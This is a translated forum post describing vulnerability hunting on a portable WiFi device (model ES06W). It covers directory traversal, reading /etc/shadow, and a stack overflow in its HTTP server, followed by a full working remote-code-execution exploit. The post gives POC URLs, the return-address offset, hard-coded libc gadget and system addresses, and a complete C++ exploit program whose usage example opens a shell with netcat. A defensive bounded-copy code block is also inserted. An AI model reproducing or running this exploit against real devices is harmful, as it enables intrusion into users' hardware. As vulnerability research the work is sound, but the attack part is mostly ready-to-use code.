[Original] An attempt at vulnerability hunting on a portable WiFi device
Posted: 2022-8-5 19:53 | 26893


I recently bought a portable WiFi device, and since I happen to be studying vulnerability hunting, I used it for practice.
Device version info:

software_version = V4565R03C01S61
hardware_version = M2V1
product_model = ES06W
upgrade_version = V4565R03C01S61

First I scanned the device's open ports: 22, 80, 443, 5555, 8080, 9090 and several others. I tried brute-forcing SSH, but the password is not a weak one, so there was no progress there.

Ports 443 and 9090 return 404 when accessed; they probably need other parameters, so no progress there either.
Port 5555 (the adb debug port) is open, so device access can be obtained directly over adb. I kept looking for other exploitable points. Visiting port 8080 redirects by default to a page (the URL is obfuscated in the original post).

Looking through the BurpSuite history, I found a request (its details are obfuscated in the original post).
I tried directory traversal through the dir parameter, e.g. /file_list.json?dir=../../../../../, and confirmed a directory traversal vulnerability.

Continuing through the BurpSuite history, I found another request (its details are obfuscated in the original post).
So I tried directory traversal through the URI to read files and confirmed an arbitrary file read vulnerability. With it, /etc/shadow can be read to obtain the SSH password hash; after cracking it, one could log in directly over SSH.

Next I pulled the HTTP server binary off the device for analysis. Since port 5555 is open by default, adb gives device access directly. Looking at the connection state shows that /opt/ejoin/bin/vfd is the HTTP server.
/opt/ejoin/bin/vfd is a 32-bit ARM binary. I located the HTTP request parsing code and analysed it, looking first for command injection. vfd contains no calls to system or popen; commands are executed through the sub_C1F4 function.
sub_C1F4 calls sub_12024, which executes commands by passing its arguments to the /opt/ejoin/var/pipe/vshd program.
Looking at the callers of sub_12024: in sub_12280 and sub_12294 the arguments are not controllable; only in sub_122A8 does the argument appear to be controllable. sub_122A8 concatenates its a1 argument into a "cd %s" command and executes it.
sub_122A8 has only a single caller. From the debug information, the a1 argument passed to sub_122A8 is a directory.
Following the cross-references further, the directory ultimately comes from a request parameter (the details are obfuscated in the original post).
So I constructed the following request (obfuscated in the original post).
I also tried constructing another request (obfuscated in the original post).

Next I looked for stack overflow bugs in vfd's request-parsing code, and found one in the parsing of a request (the details are obfuscated in the original post).
Searching further, sub_D7A8 copies the URI directly into the stack buffer s when parsing a file-read request; s is only 280 bytes, so this is another stack overflow.

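As an added illustration (not code from the write-up or from the vfd binary), here is what a bounded, traversal-aware version of the URI copy described for sub_D7A8 would look like; it also covers the dir parameter traversal found earlier. The 280-byte size comes from the write-up; the function names and the 'a'-filled test URI are my own constructions.

```c
#include <string.h>
#include <stdbool.h>
#define URI_BUF_SIZE 280   /* stack buffer size the write-up reports for sub_D7A8 */
enum uri_status { URI_OK = 0, URI_TOO_LONG = 1, URI_TRAVERSAL = 2 };

/* True if any '/'-separated segment of path is "." or "..". Segment-wise
 * matching catches a leading or trailing ".." that a substring search for
 * "../" misses. Run it on the %xx-decoded path, or "%2e%2e" slips through. */
bool has_dot_segment(const char *path)
{
    const char *seg = path;
    for (;;) {
        const char *end = strchr(seg, '/');
        size_t len = end ? (size_t)(end - seg) : strlen(seg);
        if ((len == 1 && seg[0] == '.') ||
            (len == 2 && seg[0] == '.' && seg[1] == '.'))
            return true;
        if (!end) return false;
        seg = end + 1;
    }
}

/* Bounded replacement for the unchecked copy into s: copy only if the URI
 * fits with its terminator, and refuse traversal before any file API sees it. */
enum uri_status copy_uri_checked(const char *uri, char *dst, size_t dst_size)
{
    size_t n = 0;
    while (n < dst_size && uri[n] != '\0') n++;   /* bounded scan, no strlen */
    if (n >= dst_size) return URI_TOO_LONG;       /* the overflow case */
    if (has_dot_segment(uri)) return URI_TRAVERSAL;
    memcpy(dst, uri, n + 1);
    return URI_OK;
}

/* Validate a URI against a 280-byte stack buffer like the one in sub_D7A8. */
enum uri_status validate_request_uri(const char *uri)
{
    char s[URI_BUF_SIZE];
    return copy_uri_checked(uri, s, sizeof s);
}

/* Status for a constructed URI of len 'a' bytes (capped at 1023): the
 * shape of the write-up's pattern POC, built here as test input only. */
enum uri_status long_uri_status(size_t len)
{
    char buf[1024];
    if (len >= sizeof buf) len = sizeof buf - 1;
    memset(buf, 'a', len);
    buf[len] = '\0';
    return validate_request_uri(buf);
}
```
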
Here I tried exploiting the stack overflow in sub_D7A8. After connecting to the device over adb, I debugged vfd with gdb and sent the following POC:

http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdcecfcgchcicjckclcmcncocpcqcrcsctcucvcwcxcycz
From the value left in the PC register, the offset of the return address to overwrite is 261.
Modifying the POC as follows hijacks PC to a chosen address:

http://192.168.0.1:8080/aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHaIaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbibjbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTbUbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccdc123DDDD
The vulnerable function returns via POP {R4-R7,PC}, so registers R4-R7 are controllable as well.
The system has no ASLR, so exploitation is fairly simple; the only constraint is avoiding string truncation. So I looked in libc for the gadget MOV R0,SP; LDR R2,[R7]; BLX R2, found it at 0x48d50294, and used that address to overwrite the return address.
After the vulnerable function returns, SP points just past the overwritten return address, so the string R0 ends up pointing to is controlled by the URL content. R2 is controlled through R7. system in libc is at 0x48CEA830, and I found a pointer holding that address at 0x48CB5FBC to load into R7.
I rebuilt the POC as follows and debugged again:
After triggering the bug, when execution reaches 0x48d50294, R7 holds the controlled value 0x48CB5FBC.
At this point SP points just past the value used to overwrite the return address, so the command to run can be appended to the end of the URL.
When the BLX R2 instruction executes, R2 holds the address of system.
Testing the EXP:
EXP:

// ES06W-RCE.cpp : sends the sub_D7A8 stack-overflow request to vfd on port 8080
// (Windows/Winsock build; the stdafx.h precompiled header is replaced by the
// standard headers it provided)
#define _WINSOCK_DEPRECATED_NO_WARNINGS
#include <stdio.h>
#include <string.h>
#include <WinSock2.h>
#include <Windows.h>

#pragma comment(lib, "ws2_32.lib")

void ShowHelp()
{
    printf("[+]Usage: ES06W-RCE.exe [Command]\n");
    printf("[+]Example: ES06W-RCE.exe \"nc${IFS}-lp${IFS}4444${IFS}-e${IFS}/bin/sh\"\n");
}

int main(int argc, char** argv)
{
    WSADATA stcData = {};
    int int_ret = 0;
    char str_recv[0x1000] = {};
    char str_payload_final[0x1000] = {};

    // Exactly one argument: the command to run on the device
    if (argc != 2) {
        ShowHelp();
        return 0;
    }
    // Initialise Winsock (WSAStartup returns 0 on success, an error code otherwise)
    int_ret = WSAStartup(MAKEWORD(2, 2), &stcData);
    if (int_ret != 0) {
        printf("[-]Init Failed!\n");
        return 0;
    }

    // Request line: padding up to the saved R7 slot, the R7 value, the return
    // address (libc gadget), then the command string that sits at SP (R0)
    // when the gadget runs
    char str_payload[] =
        "GET /aaabacadaeafagahaiajakalamanaoapaqarasatauavawaxayazaAaBaCaDaEaFaGaHa"
        "IaJaKaLaMaNaOaPaQaRaSaTaUaVaWaXaYaZa0a1a2a3a4a5a6a7a8a9babbbcbdbebfbgbhbib"
        "jbkblbmbnbobpbqbrbsbtbubvbwbxbybzbAbBbCbDbEbFbGbHbIbJbKbLbMbNbObPbQbRbSbTb"
        "UbVbWbXbYbZb0b1b2b3b4b5b6b7b8b9cacbcccd"
        "\xBC\x5F\xCB\x48"                    // Control R7: 0x48CB5FBC, pointer to system
        "\x94\x02\xD5\x48"                    // Return addr: 0x48d50294, MOV R0,SP; LDR R2,[R7]; BLX R2
        "%s"                                  // Command, filled in by sprintf_s
        " HTTP/1.1\r\n"
        "Host: 192.168.0.1:8080\r\n"
        "Connection: keep-alive\r\n"
        "Upgrade-Insecure-Requests: 1\r\n"
        "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/103.0.0.0 Safari/537.36\r\n"
        "Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9\r\n"
        "Accept-Encoding: gzip, deflate\r\n"
        "Accept-Language: zh-CN,zh;q=0.9\r\n\r\n";

    sprintf_s(str_payload_final, sizeof(str_payload_final), str_payload, argv[1]);

    // Connect to the device's HTTP service
    SOCKET sock_client = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    if (sock_client == INVALID_SOCKET) {
        printf("[-]Socket Failed!\n");
        WSACleanup();
        return 0;
    }
    sockaddr_in sock_addr = {};
    sock_addr.sin_family = AF_INET;
    sock_addr.sin_port = htons(8080);
    sock_addr.sin_addr.S_un.S_addr = inet_addr("192.168.0.1");

    int_ret = connect(sock_client, (sockaddr*)&sock_addr, sizeof(sockaddr_in));
    if (int_ret == SOCKET_ERROR) {
        printf("[-]Connect Failed!\n");
        closesocket(sock_client);
        WSACleanup();
        return 0;
    }

    // Send the request and print whatever the server answers
    send(sock_client, str_payload_final, (int)strlen(str_payload_final), 0);
    Sleep(20);
    recv(sock_client, str_recv, sizeof(str_recv) - 1, 0);   // leave room for the terminator
    printf("[-]Recv: %s\n", str_recv);

    printf("[+]Finished!\n");
    closesocket(sock_client);
    WSACleanup();
    return 0;
}
Latest replies (11)
#2 (2022-8-5 21:05)
Nice work, bro. Envious of an all-rounder who can do both system security and web security...
#3 (2022-8-7 23:21)
Thanks for sharing
#4 (2022-8-8 11:15)
Thanks for sharing
#5 (2022-8-8 15:09)
666
#7 (2022-8-9 15:06)
666
#9 (2022-8-10 19:12)
Learned something, thanks for sharing
#10 (2022-10-13 09:42)
666
#11 (2022-10-13 11:28)
So strong: reverse engineering, auditing, pentesting, coding, all-round skills. Respect to the master!
#12 (2022-11-19 18:06)
Master, which product is this? I'd like to follow along and reproduce it.